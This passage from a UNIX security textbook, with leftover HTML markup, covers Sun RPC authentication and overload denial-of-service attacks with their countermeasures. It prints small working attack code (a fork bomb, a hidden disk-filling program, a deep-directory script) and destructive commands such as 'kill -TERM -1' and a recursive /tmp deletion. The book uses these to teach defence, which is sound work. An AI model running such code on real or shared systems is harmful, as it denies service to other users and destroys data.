common). After their creation by Sun, XDR and RPC were reimplemented by the University of<br />

California at Berkeley and are now freely available.<br />

Sun's RPC is not unique. A different RPC system is used by the Open Software Foundation's Distributed<br />

Computing Environment (DCE). Yet another RPC system has been proposed by the Object Management<br />

Group. Called CORBA (Common Object Request Broker Architecture), this system is optimized for<br />

RPC between object-oriented programs written in C++ or SmallTalk.<br />

In the following sections, we'll discuss the Sun RPC mechanism, as it seems to be the most widely used.<br />

The continuing popularity of NFS (described in Chapter 20) suggests that Sun RPC will be in widespread<br />

use for some time to come.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_02.htm (1 of 4) [2002-04-12 10:44:52]


[Chapter 19] 19.2 Sun's Remote Procedure Call (RPC)<br />

19.2.1 Sun's portmap/rpcbind<br />

For an RPC client to communicate with an RPC server, many things must happen:<br />

●<br />

●<br />

●<br />

●<br />

The RPC client must be running.<br />

The RPC server must be running on the server machine (or it must be automatically started when<br />

the request is received).<br />

The client must know on which host the RPC server is located.<br />

The client and the server must agree to communicate on a particular TCP or UDP port.<br />

The simplest way to satisfy this list of conditions is to have the <strong>UNIX</strong> computer start the server when the<br />

computer boots, to have the server running on a well-known host, and to have the port numbers<br />

predefined. This is the approach that <strong>UNIX</strong> takes with standard <strong>Internet</strong> services such as Telnet and<br />

SMTP.<br />

The approach that Sun took for RPC was different. Instead of having servers run on a well-known port,<br />

Sun developed a program called portmap in SunOS 4.x, and renamed rpcbind in Solaris 2.x. We will<br />

refer to the program as the portmapper.<br />

When an RPC server starts, it dynamically obtains a free UDP or TCP port, then registers itself with the<br />

portmapper. When a client wishes to communicate with a particular server, it contacts the portmapper<br />

process, determines the port number used by the server, and then initiates communication.<br />

The portmapper approach has the advantage that you can have many more RPC services (in theory, 232)<br />

than there are IP port numbers (216).[2] In practice, however, the greater availability of RPC server<br />

numbers has not been very important. Indeed, one of the most widely used RPC services, NFS, usually<br />

has a fixed UDP port of 2049.<br />

[2] Of course, you can't really have 232 RPC services, because there aren't enough<br />

programmers to write them, or enough computers and RAM for them to run. The reason for<br />

having 232 different RPC service numbers available was that different vendors could pick<br />

RPC numbers without the possibility of conflict. A better way to have reached this goal<br />

would have been to allow RPC services to use names, so that companies and organizations<br />

could have registered their RPC services using their names as part of the service names - but<br />

the designers didn't ask us.<br />

The portmapper program also complicates building <strong>Internet</strong> firewalls, because you almost never know in<br />

advance the particular IP port that will be used by RPC-based services.<br />

19.2.2 RPC Authentication<br />

Client programs contacting an RPC server need a way to authenticate themselves to the server, so that the<br />

server can determine what information the client should be able to access, and what functions should be<br />

allowed. Without authentication, any client on the network that can send packets to the RPC server could<br />

access any function.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_02.htm (2 of 4) [2002-04-12 10:44:52]


[Chapter 19] 19.2 Sun's Remote Procedure Call (RPC)<br />

There are several different forms of authentication available for RPC, as described in Table 19.1. Not all<br />

authentication systems are available in all versions of RPC:<br />

Table 19.1: RPC Authentication Options<br />

System Authentication Technique Comments<br />

AUTH_NONE None No authentication. Anonymous access.<br />

AUTH_<strong>UNIX</strong>[3] RPC client sends the <strong>UNIX</strong> UID and GIDs Not secure. Server implicitly trusts that<br />

for the user.<br />

the user is who the user claims to be.<br />

AUTH_DES Authentication based on public key<br />

cryptography and DES<br />

Reasonably secure, although not widely<br />

available from manufacturers other than<br />

Sun.<br />

AUTH_KERB Authentication based on Kerberos Very secure, but requires that you set up<br />

a Kerberos Server (described later in this<br />

chapter). As with AUTH_DES,<br />

AUTH_KERB is not widely available.<br />

[3] AUTH_<strong>UNIX</strong> is called AUTH_SYS in at least one version of Sun Solaris.<br />

19.2.2.1 AUTH_NONE<br />

Live fast, die young. AUTH_NONE is bare-bones RPC with no user authentication. You might use it for<br />

services that require and provide no useful information, such as time of day. On the other hand, why do<br />

you want other computers on the network to be able to find out the setting of your's system's time-of-day<br />

clock? (Furthermore, because the system's time of day is used in a variety of cryptographic protocols,<br />

even that information might be usable in an attack against your computer.)<br />

19.2.2.2 AUTH_<strong>UNIX</strong><br />

AUTH_<strong>UNIX</strong> was the only authentication system provided by Sun through Release 4.0 of the SunOS<br />

operating systems, and it is the only form of RPC authentication offered by many <strong>UNIX</strong> vendors. It is<br />

widely used. Unfortunately, it is fundamentally unsecure.<br />

With AUTH_<strong>UNIX</strong>, each RPC request is accompanied with a UID and a set of GIDS[4] for<br />

authentication. The server implicitly trusts the UID and GIDS presented by the client, and uses this<br />

information to determine if the action should be allowed or not. Anyone with access to the network can<br />

craft an RPC packet with any arbitrary values for UID and GID. Obviously, AUTH_<strong>UNIX</strong> is not secure,<br />

because the client is free to claim any identity, and there is no provision for checking on the part of the<br />

server.<br />

[4] Some versions of RPC present eight additional GIDs, while others present up to 16.<br />

In recent years, Sun has changed the name AUTH_<strong>UNIX</strong> to AUTH_SYS. Nevertheless, it's still the same<br />

system.<br />

19.2.2.3 AUTH_DES<br />

AUTH_DES is the basis of Sun's "<strong>Sec</strong>ure RPC" (described later in this chapter). AUTH_DES uses a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_02.htm (3 of 4) [2002-04-12 10:44:52]


[Chapter 19] 19.2 Sun's Remote Procedure Call (RPC)<br />

combination of secret key and public key cryptography to allow security in a networked environment. It<br />

was developed several years after AUTH_<strong>UNIX</strong>, and is not widely available on <strong>UNIX</strong> platforms other<br />

than Sun's SunOS and Solaris 2.x operating systems.<br />

19.2.2.4 AUTH_KERB<br />

AUTH_KERB is a modification to Sun's RPC system that allows it to interoperate with MIT's Kerberos<br />

system for authentication. Although Kerberos was developed in the mid 1980s, AUTH_KERB<br />

authentication for RPC was not incorporated into Sun's RPC until the early 1990s.<br />

NOTE: Carefully review the RPC services that are configured into your system for<br />

automatic start when the system boots, or for automatic dispatch from the inetd (see Chapter<br />

17, TCP/IP Services). If you don't need a service, disable it.<br />

In particular, if your version of the rexd service cannot be forced into only accepting<br />

connections authenticated with Kerberos or <strong>Sec</strong>ure RPC, then it should be turned off. The<br />

rexd daemon (which executes commands issued with the on command) otherwise is easily<br />

fooled into executing commands on behalf of any non-root user.<br />

19.1 <strong>Sec</strong>uring Network<br />

Services<br />

19.3 <strong>Sec</strong>ure RPC<br />

(AUTH_DES)<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_02.htm (4 of 4) [2002-04-12 10:44:52]


[Chapter 25] 25.2 Overload Attacks<br />

25.2 Overload Attacks<br />

Chapter 25<br />

Denial of Service Attacks and<br />

Solutions<br />

In an overload attack, a shared resource or service is overloaded with requests to such a point that it's unable to satisfy<br />

requests from other users. For example, if one user spawns enough processes, other users won't be able to run processes of<br />

their own. If one user fills up the disks, other users won't be able to create new files. You can partially protect against<br />

overload attacks by partitioning your computer's resources, and limiting each user to one partition. Alternatively, you can<br />

establish quotas to limit each user. Finally, you can set up systems for automatically detecting overloads and restarting your<br />

computer.<br />

25.2.1 Process-Overload Problems<br />

One of the simplest denial of service attacks is a process attack. In a process attack, one user makes a computer unusable for<br />

others who happen to be using the computer at the same time. Process attacks are generally of concern only with shared<br />

computers: the fact that a user incapacitates his or her own workstation is of no interest if nobody else is using the machine.<br />

25.2.1.1 Too many processes<br />

The following program will paralyze or crash many older versions of <strong>UNIX</strong>:<br />

main()<br />

{<br />

while (1)<br />

fork();<br />

}<br />

When this program is run, the process executes the fork() instruction, creating a second process identical to the first. Both<br />

processes then execute the fork() instruction, creating four processes. The growth continues until the system can no longer<br />

support any new processes. This is a total attack, because all of the child processes are waiting for new processes to be<br />

established. Even if you were somehow able to kill one process, another would come along to take its place.<br />

This attack will not disable most current versions of <strong>UNIX</strong>, because of limits on the number of processes that can be run<br />

under any UID (except for root). This limit, called MAXUPROC, is usually configured into the kernel when the system is<br />

built. Some <strong>UNIX</strong> systems allow this value to be set at boot time; for instance, Solaris allows you to put the following in your<br />

/etc/system file:<br />

set maxuproc=100<br />

A user employing this attack will use up his quota of processes, but no more. As superuser, you will then be able to use the ps<br />

command to determine the process numbers of the offending processes and use the kill command to kill them. You cannot kill<br />

the processes one by one, because the remaining processes will simply create more. A better approach is to use the kill<br />

command to first stop each process, then kill them all at once:<br />

# kill -STOP 1009 1110 1921<br />

# kill -STOP 3219 3220<br />

.<br />

.<br />

.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (1 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

# kill -KILL 1009 1110 1921 3219 3220...<br />

Because the stopped processes still come out of the user's NPROC quota, the forking program will be able to spawn no more.<br />

You can then deal with the author.<br />

Alternatively, you can kill all the processes in a process group at the same time; in many cases of a user spawning too many<br />

processes, the processes will all be in the same process group. To discover the process group, run the ps command with the -j<br />

option. Identify the process group, and then kill all processes with one fell swoop:<br />

# kill -9 -1009<br />

Note that many older, AT&T-derived systems do not support either process groups or the enhanced version of the kill<br />

command, but it is present in SVR4. This enhanced version of kill interprets the second argument as indicating a process<br />

group if it is preceded by a "-", and the absolute value of the argument is used as the process group; the indicated signal is<br />

sent to every process in the group.<br />

Under modern versions of <strong>UNIX</strong>, the root user can still halt the system with a process attack because there is no limit to the<br />

number of processes that the superuser can spawn. However, the superuser can also shut down the machine or perform almost<br />

any other act, so this is not a major concern - except when root is running a program that is buggy (or booby-trapped). In<br />

these cases, it's possible to encounter a situation in which the machine is overwhelmed to the point where no one else can get<br />

a free process even to do a login.<br />

There is also a possibility that your system may reach the total number of allowable processes because so many users are<br />

logged on, even though none of them has reached her individual limit.<br />

One other possibility is that your system has been configured incorrectly. Your per-user process limit may be equal to or<br />

greater than the limit for all processes on the system. In this case, a single user can swamp the machine.<br />

If you are ever presented with an error message from the shell that says "No more processes," then either you've created too<br />

many child processes or there are simply too many processes running on the system; the system won't allow you to create any<br />

more processes.<br />

For example:<br />

% ps -efj<br />

No more processes %<br />

If you run out of processes, wait a moment and try again. The situation may have been temporary. If the process problem does<br />

not correct itself, you have an interesting situation on your hands.<br />

Having too many processes that are running can be very difficult to correct without rebooting the computer; there are two<br />

reasons why:<br />

●<br />

●<br />

You cannot run the ps command to determine the process numbers of the processes to kill.<br />

If you are not currently the superuser, you cannot use the su or login command, because both of these functions require<br />

the creation of a new process.<br />

One way around the second problem is to use the shell's exec[1] built-in command to run the su command without creating a<br />

new process:<br />

[1] The shell's exec function causes a program to be run (with the exec() system call) without a fork() system call<br />

being executed first; the user-visible result is that the shell runs the program and then exits.<br />

% exec /bin/su<br />

password: foobar<br />

#<br />

Be careful, however, that you do not mistype your password or exec the ps program: the program will execute, but you will<br />

then be automatically logged out of your computer!<br />

If you have a problem with too many processes saturating the system, you may be forced to reboot the system. The simplest<br />

way might seem to be to power-cycle the machine. However, this may damage blocks on disk, because it will probably not<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (2 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

flush active buffers to disk - few systems are designed to undergo an orderly shutdown when powered off suddenly. It's better<br />

to use the kill command to kill the errant processes or to bring the system to single-user mode. (See Appendix C, <strong>UNIX</strong><br />

Processes for information about kill, ps, <strong>UNIX</strong> processes, and signals.)<br />

On most modern versions of <strong>UNIX</strong>, the superuser can send a SIGTERM signal to all processes except system processes and<br />

your own process by typing:<br />

# kill -TERM -1<br />

#<br />

If your <strong>UNIX</strong> system does not have this feature, you can execute the command:<br />

# kill -TERM 1<br />

#<br />

to send a SIGTERM to the init process. <strong>UNIX</strong> automatically kills all processes and goes to single-user mode when init dies.<br />

You can then execute the sync command from the console and reboot the operating system.<br />

If you get the error "No more processes" when you attempt to execute the kill command, exec a version of the ksh or csh -<br />

they have the kill command built into them and therefore don't need to spawn an extra process to run the command.<br />

25.2.1.2 System overload attacks<br />

Another common process-based denial of service occurs when a user spawns many processes that consume large amounts of<br />

CPU. As most <strong>UNIX</strong> systems use a form of simple round-robin scheduling, these overloads reduce the total amount of CPU<br />

processing time available for all other users. For example, someone who dispatches ten find commands with grep components<br />

throughout your Usenet directories, or spawns a dozen large troff jobs can slow the system to a crawl.[2]<br />

[2] We resist using the phrase commonly found on the net of "bringing the system to its knees." <strong>UNIX</strong> systems<br />

have many interesting features, but knees are not among them. How the systems manage to crawl, then, is left as<br />

an exercise to the reader.<br />

The best way to deal with these problems is to educate your users about how to share the system fairly. Encourage them to<br />

use the nice command to reduce the priority of their background tasks, and to do them a few at a time. They can also use the<br />

at or batch command to defer execution of lengthy tasks to a time when the system is less crowded. You'll need to be more<br />

forceful with users who intentionally or repeatedly abuse the system.<br />

If your system is exceptionally loaded, log in as root and set your own priority as high as you can right away with the renice<br />

command, if it is available on your system:[3]<br />

[3] In this case, your login may require a lot of time; renice is described in more detail in Appendix C.<br />

# renice -19 $$$<br />

#<br />

Then, use the ps command to see what's running, followed by the kill command to remove the processes monopolizing the<br />

system, or the renice command to slow down these processes.<br />

25.2.2 Disk Attacks<br />

Another way of overwhelming a system is to fill a disk partition. If one user fills up the disk, other users won't be able to<br />

create files or do other useful work.<br />

25.2.2.1 Disk-full attacks<br />

A disk can store only a certain amount of information. If your disk is full, you must delete some information before more can<br />

be stored.<br />

Sometimes disks fill up suddenly when an application program or a user erroneously creates too many files (or a few files that<br />

are too large). Other times, disks fill up because many users are slowly increasing their disk usage.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (3 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

The du command lets you find the directories on your system that contain the most data. du searches recursively through a<br />

tree of directories and lists how many blocks are used by each one. For example, to check the entire /usr partition, you could<br />

type:<br />

# du /usr<br />

29 /usr/dict/papers<br />

3875 /usr/dict<br />

8 /usr/pub<br />

4032 /usr ...<br />

#<br />

By finding the larger directories, you can decide where to focus your cleanup efforts.<br />

You can also search for and list only the names of the larger files by using the find command. You can also use the find<br />

command with the -size option to list only the files larger than a certain size. Additionally, you can use the options called<br />

-xdev or -local to avoid searching NFS-mounted directories (although you will want to run find on each NFS server.) This<br />

method is about as fast as doing a du and can be even more useful when trying to find a few large files that are taking up<br />

space. For example:<br />

# find /usr -size +1000 -exec ls -l {} \;<br />

-rw-r--r-- 1 root 1819832 Jan 9 10:45 /usr/lib/libtext.a<br />

-rw-r--r-- 1 root 2486813 Aug 10 1985 /usr/dict/web2<br />

-rw-r--r-- 1 root 1012730 Aug 10 1985 /usr/dict/web2a<br />

-rwxr-xr-x 1 root 589824 Oct 22 21:27 /usr/bin/emacs<br />

-rw-r--r-- 1 root 7323231 Oct 31 1990 /usr/tex/TeXdist.tar.Z<br />

-rw-rw-rw- 1 root 772092 Mar 10 22:12 /var/spool/mqueue/syslog<br />

-rw-r--r-- 1 uucp 1084519 Mar 10 22:12 /var/spool/uucp/LOGFILE<br />

-r--r--r-- 1 root 703420 Nov 21 15:49 /usr/tftpboot/mach<br />

...<br />

#<br />

In this example, the file /usr/tex/TeXdist.tar.Z is probably a candidate for deletion - especially if you have already unpacked<br />

the TeX distribution. The files /var/spool/mqueue/syslog and /var/spool/uucp/LOGFILE are also good candidates to delete,<br />

after saving them to tape or another disk.<br />

25.2.2.2 quot command<br />

The quot command lets you summarize filesystem usage by user; this program is available on some System V and on most<br />

Berkeley-derived systems. With the -f option, quot prints the number of files and the number of blocks used by each user:<br />

# quot -f /dev/sd0a<br />

/dev/sd0a (/):<br />

53698 4434 root<br />

4487 294 bin<br />

681 155 hilda<br />

319 121 daemon<br />

123 25 uucp<br />

24 1 audit<br />

16 1 mailcmd<br />

16 1 news<br />

6 7 operator<br />

#<br />

You do not need to have disk quotas enabled to run the quot -f command.<br />

NOTE: The quot -f command may lock the device while it is running. All other programs that need to access the<br />

device will be blocked until the quot -f command completes.<br />

25.2.2.3 Inode problems<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (4 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

The <strong>UNIX</strong> filesystem uses inodes to store information about files. One way to make the disk unusable is to consume all of the<br />

free inodes on a disk, so no new files can be created. A person might inadvertently do this by creating thousands of empty<br />

files. This can be a perplexing problem to diagnose if you're not aware of the potential because the df command might show<br />

lots of available space, but attempts to create a file will result in a "no space" error. In general, each new file, directory, pipe,<br />

FIFO, or socket requires an inode on disk to describe it. If the supply of available inodes is exhausted, the system can't<br />

allocate a new file even if disk space is available.<br />

You can tell how many inodes are free on a disk by issuing the df command with the -i option:<br />

% df -o i /usr >may be df -i on some systems<br />

Filesystem iused ifree %iused Mounted on<br />

/dev/dsk/c0t3d0s5 20100 89404 18% /usr<br />

%<br />

The output shows that this disk has lots of inodes available for new files.<br />

The number of inodes in a filesystem is usually fixed at the time you initially format the disk for use. The default created for<br />

the partition is usually appropriate for normal use, but you can override it to provide more or fewer inodes, as you wish. You<br />

may wish to increase this number for partitions in which you have many small files - for example, a partition to hold Usenet<br />

files (e.g., /var/spool/news). If you run out of inodes on a filesystem, about the only recourse is to save the disk to tape,<br />

reformat with more inodes, and then restore the contents.<br />

25.2.2.4 Using partitions to protect your users<br />

You can protect your system from disk attacks by dividing your hard disk into several smaller partitions. Place different users'<br />

home directories on different partitions. In this manner, if one user fills up one partition, users on other partitions won't be<br />

affected. (Drawbacks of this approach include needing to move directories to different partitions if they require more space,<br />

and an inability to hard-link files between some user directories.)<br />

25.2.2.5 Using quotas<br />

A more effective way to protect your system from disk attacks is to use the quota system that is available on most modern<br />

versions of <strong>UNIX</strong>. (Quotas are usually available as a build-time or run-time option on POSIX systems.)<br />

With disk quotas, each user can be assigned a limit for how many inodes and how many disk blocks that user can use. There<br />

are two basic kinds of quotas:<br />

●<br />

●<br />

Hard quotas are absolute limits on how many inodes and how much space the user may consume.<br />

Soft quotas are advisory. Users are allowed to exceed soft quotas for a grace period of several days. During this time,<br />

the user is issued a warning whenever he or she logs into the system. After the final day, the user is not allowed to<br />

create any more files (or use any more space) without first reducing current usage.<br />

A few systems also support a group quota, which allows you to set a limit on the total space used by a whole group of users.<br />

This can result in cases where one user can deny another the ability to store a file if they are in the same group, so it is an<br />

option you may not wish to use.<br />

To enable quotas on your system, you first need to create the quota summary file. This is usually named quotas, and is located<br />

in the top-level directory of the disk. Thus, to set quotas on the /home partition, you would issue the following commands:[4]<br />

[4] If your system supports group quotas, the file will be named something else, such as quotas.user or<br />

quotas.group.<br />

# cp /dev/null /home/quotas<br />

# chmod 600 /home/quotas<br />

# chown root /home/quotas<br />

You also need to mark the partition as having quotas enabled. You do this by changing the filesystem file in your /etc<br />

directory: depending on the system, this may be /etc/fstab, /etc/vfstab, /etc/checklist, or /etc/filesystems. If the option field is<br />

currently rw you will change it to rq; otherwise, you probably add the options parameter.[5] Then, you need to build the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (5 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

options tables on every disk. This process is done with the quotacheck -a command. (If your version of quotacheck takes the<br />

-p option, you may wish to use it to make the checks faster.) Note that if there are any active users on the system, this check<br />

may result in improper values. Thus, we advise that you reboot; the quotacheck command should run as part of the standard<br />

boot sequence and will check all the filesystems you enabled.<br />

[5] This is yet another example of how non-standard <strong>UNIX</strong> has become, and why we have not given more<br />

examples of how to set up each and every system for each option we have explained. It is also a good illustration<br />

of why you should consult your vendor documentation to see how to interpret our suggestions appropriately for<br />

your release of the operating system.<br />

Last of all, you can edit an individual user's quotas with the edquota command:<br />

# edquota spaf<br />

If you want to "clone" the same set of quotas to multiple users and your version of the command supports the -p option, you<br />

may do so by using one user's quotas as a "prototype":<br />

# edquota -p spaf simsong beth kathy<br />

You and your users can view quotas with the quota command; see your documentation for particular details.<br />

25.2.2.6 Reserved space<br />

Versions of <strong>UNIX</strong> that use a filesystem derived from the BSD Fast Filesystem (FFS) have an additional protection against<br />

filling up the disk: the filesystem reserves approximately 10% of the disk and makes it unusable by regular users. The reason<br />

for reserving this space is performance: the BSD Fast Filesystem does not perform as well if less than 10% of the disk is free.<br />

However, this restriction also prevents ordinary users from overwhelming the disk. The restriction does not apply to processes<br />

running with superuser privileges.<br />

This "minfree" value (10%) can be set to other values when the partition is created. It can also be changed afterwards using<br />

the tunefs command, but setting it to less than 10% is probably not a good idea.<br />

The Linux ext2 filesystem also allows you to reserve space on your filesystem. The amount of space that is reserved, 10% by<br />

default, can be changed with the tune2fs command.<br />

25.2.2.7 Hidden space<br />

Open files that are unlinked continue to take up space until they are closed. The space that these files take up will not appear<br />

with the du or find commands, because they are not in the directory tree; however, they will nevertheless take up space,<br />

because they are in the filesystem.<br />

For example:<br />

main()<br />

{<br />

}<br />

int ifd;<br />

char buf[8192];<br />

ifd = open("./attack", O_WRITE|O_CREAT, 0777);<br />

unlink("./attack");<br />

while (1)<br />

write (ifd, buf, sizeof(buf));<br />

Files created in this way can't be found with the ls or du commands because the files have no directory entries.<br />

To recover from this situation and reclaim the space, you must kill the process that is holding the file open. You may have to<br />

take the system into single-user mode and kill all processes if you cannot determine which process is to blame. After you've<br />

done this, run the filesystem consistency checker (e.g., fsck) to verify that the free list was not damaged during the shutdown<br />

operation.<br />

You can more easily identify the program at fault by downloading a copy of the freeware lsof program from the net. This<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (6 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

program will identify the processes that have open files, and the file position of each open file.[6] By identifying a process<br />

with an open file that has a huge current offset, you can terminate that single process to regain the disk space. After the<br />

process dies and the file is closed, all the storage it occupied is reclaimed.<br />

[6] Actually, you should consider getting a copy of lsof for other reasons, too. It has an incredible number of<br />

other uses, such as determining which processes have open network connections and which processes have their<br />

current directories on a particular disk.<br />

25.2.2.8 Tree-structure attacks<br />

It is also possible to attack a system by building a tree structure that is made too deep to be deleted with the rm command.<br />

Such an attack could be caused by something like the following shell file:<br />

$!/bin/ksh<br />

$<br />

$<br />

Don't try this at home!<br />

while mkdir anotherdir<br />

do<br />

cd ./anotherdir<br />

cp /bin/cc fillitup<br />

done<br />

On some systems, rm -r cannot delete this tree structure because the directory tree overflows either the buffer limits used<br />

inside the rm program to represent filenames or the number of open directories allowed at one time.<br />

You can almost always delete a very deep set of directories by manually using the chdir command from the shell and going to<br />

the bottom of the tree, then deleting the files and directories one at a time. This process can be very tedious. Unfortunately,<br />

some <strong>UNIX</strong> systems do not let you chdir to a directory described by a path that contains more than a certain number of<br />

characters.<br />

Another approach is to use a script similar to the one in Example 25-1:<br />

Example 25.1: Removing Nested Directories<br />

#!/bin/ksh<br />

if (( $# != 1 ))<br />

then<br />

print -u2 "usage: $0 "<br />

exit 1<br />

fi<br />

typeset -i index=1 dindex=0<br />

typeset t_prefix="unlikely_fname_prefix" fname=$(basename $1)<br />

cd $(dirname "$1") # go to the directory containing the problem<br />

while (( dindex < index ))<br />

do<br />

for entry in $(ls -1a "$fname")<br />

do<br />

[[ "$entry" == @(.|..) ]] && continue<br />

if [[ -d "$fname/$entry" ]]<br />

then<br />

rmdir - "$fname/$entry" 2>/dev/null && continue<br />

mv "$fname/$entry" ./$t_prefix.$index<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (7 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

let index+=1<br />

else<br />

rm -f - "$fname/$entry"<br />

fi<br />

done<br />

rmdir "$fname"<br />

let dindex+=1<br />

fname="$t_prefix.$dindex"<br />

done<br />

What this method does is delete the nested directories starting at the top. It deletes any files at the top level, and moves any<br />

nested directories up one level to a temporary name. It then deletes the (now empty) top-level directory and begins anew with<br />

one of the former descendent directories. This process is slow, but it will work on almost any version of <strong>UNIX</strong>.<br />

The only other way to delete such a directory on one of these systems is to remove the inode for the top-level directory<br />

manually, and then use the fsck command to erase the remaining directories. To delete these kinds of troubling directory<br />

structures this way, follow these steps:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

Take the system to single-user mode.<br />

Find the inode number of the root of the offending directory.<br />

# ls -i anotherdir<br />

1491 anotherdir<br />

#<br />

Use the df command to determine the device of the offending directory:<br />

# /usr/bin/df anotherdir<br />

/g17 (/dev/dsk/c0t2d0s2 ): 377822 blocks 722559 files<br />

#<br />

Clear the inode associated with that directory using the clri program:[7]<br />

[7] The clri command can be found in /usr/sbin/clri on Solaris systems. If you are using SunOS, use the<br />

unlink command instead.<br />

# clri /dev/dsk/c0t2d0s2 1491<br />

#<br />

(Remember to replace /dev/dsk/c0t2d0s2 with the name of the actual device reported by the df command.)<br />

Run your filesystem consistency checker (for example, fsck /dev/dsk/cot2dos2) until it reports no errors. When the<br />

program tells you that there is an unconnected directory with inode number 1491 and asks you if you want to reconnect<br />

it, answer "no." The fsck program will reclaim all the disk blocks and inodes used by the directory tree.<br />

If you are using the Linux ext2 filesystem, you can delete an inode using the debugfs command. It is important that the<br />

filesystem be unmounted before using the debugfs command.<br />

25.2.3 Swap Space Problems<br />

Most <strong>UNIX</strong> systems are configured with some disk space for holding process memory images when they are paged or<br />

swapped out of main memory.[8] If your system is not configured with enough swap space, then new processes, especially<br />

large ones, will not be run because there is no swap space for them. This failure often results in the error message "No space"<br />

when you attempt to execute a command.<br />

[8] Swapping and paging are technically two different activities. Older systems swapped entire process memory<br />

images out to secondary storage; paging removes only portions of programs at a time. The use of the word<br />

"swap" has become so commonplace that most <strong>UNIX</strong> users use the word "swap" for both swapping and paging,<br />

so we will too.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (8 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

If you run out of swap space because processes have accidentally filled up the available space, you can increase the space<br />

you've allocated to backing store. On SVR4 or the SunOS system, this increase is relatively simple to do, although you must<br />

give up some of your user filesystem. First, find a partition with some spare storage:<br />

# /bin/df -ltk<br />

Filesystem kbytes used avail capacity Mounted on<br />

/dev/dsk/c0t3d0s0 95359 82089 8505 91% /<br />

/proc 0 0 0 0% /proc<br />

/dev/dsk/c0t1d0s2 963249 280376 634713 31% /user2<br />

/dev/dsk/c0t2d0s0 1964982 1048379 720113 59% /user3<br />

/dev/dsk/c0t2d0s6 1446222 162515 1139087 12% /user4<br />

#<br />

In this case, partition /user4 appears to have lots of spare room. You can create an additional 50 Mb of swap space on this<br />

partition with this command sequence on Solaris systems:<br />

# mkfile 50m /user4/junkfile<br />

# swap -a /user4/junkfile<br />

On SunOS systems, type:<br />

# mkfile 50m /user4/junkfile<br />

# swapon /user4/junkfile<br />

You can add this to the vfstab if you want the swap space to be available across reboots. Otherwise, remove the sequence as a<br />

swap device (swap -d /user4/junkfile) and then delete the file.<br />

Correcting a shortage of swap space on systems that do not support swapping to files (such as most older versions of <strong>UNIX</strong>)<br />

usually involves shutting down your computer and repartitioning your hard disk.<br />

If a malicious user has filled up your swap space, a short-term approach is to identify the offending process or processes and<br />

kill them. The ps command shows you the size of every executing process and helps you determine the cause of the problem.<br />

The vmstat command, if you have it, can also provide valuable process state information.<br />

25.2.4 /tmp Problems<br />

Most <strong>UNIX</strong> systems are configured so that any user can create files of any size in the /tmp directory. Normally, there is no<br />

quota checking enabled in the /tmp directory. Consequently, a single user can fill up the partition on which the /tmp directory<br />

is mounted, so that it will be impossible for other users (and possibly the superuser) to create new files.<br />

Unfortunately, many programs require the ability to store files in the /tmp directory to function properly. For example, the vi<br />

and mail programs both store temporary files in /tmp. These programs will unexpectedly fail if they cannot create their<br />

temporary files. Many locally written system administration scripts rely on the ability to create files in the /tmp directory, and<br />

do not check to make sure that sufficient space is available.<br />

Problems with the /tmp directory are almost always accidental. A user will copy a number of large files there, and then forget<br />

them. Perhaps many users will do this.<br />

In the early days of <strong>UNIX</strong>, filling up the /tmp directory was not a problem. The /tmp directory is automatically cleared when<br />

the system boots, and early <strong>UNIX</strong> computers crashed a lot. These days, <strong>UNIX</strong> systems stay up much longer, and the /tmp<br />

directory often does not get cleaned out for days, weeks, or months.<br />

There are a number of ways to minimize the danger of /tmp attacks:<br />

●<br />

●<br />

Enable quota checking on /tmp, so that no single user can fill it up. A good quota is to allow each user to take up 40%<br />

of the space in /tmp. Thus, filling up /tmp will, under the best circumstances, require collusion between more than two<br />

users.<br />

Have a process that monitors the /tmp directory on a regular basis and alerts the system administrator if it is nearly<br />

filled.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (9 of 11) [2002-04-12 10:44:54]


As the superuser, you might also want to sweep through the /tmp directory on a periodic basis and delete any files that are<br />

more than three or five days old:[9]<br />

[9] Beware that this command may be vulnerable to the filename attacks described in Chapter 11.<br />

# find /tmp -mtime +5 -print | xargs rm -rf<br />

This line is a simple addition to your crontab for nightly execution.<br />

25.2.5 Soft Process Limits: Preventing Accidental Denial of Service<br />

Most modern versions of <strong>UNIX</strong> allow you to set limits on the maximum amount of memory or CPU time a process can<br />

consume, as well as the maximum file size it can create. These limits are handy if you are developing a new program and do<br />

not want to accidentally make the machine very slow or unusable for other people with whom you're sharing.<br />

The Korn shell ulimit and C shell limit commands display the current process limits:<br />

$ ulimit -Sa -H for hard limits, -S for soft limits<br />

time(seconds) unlimited<br />

file(blocks) unlimited<br />

data(kbytes) 2097148 kbytes<br />

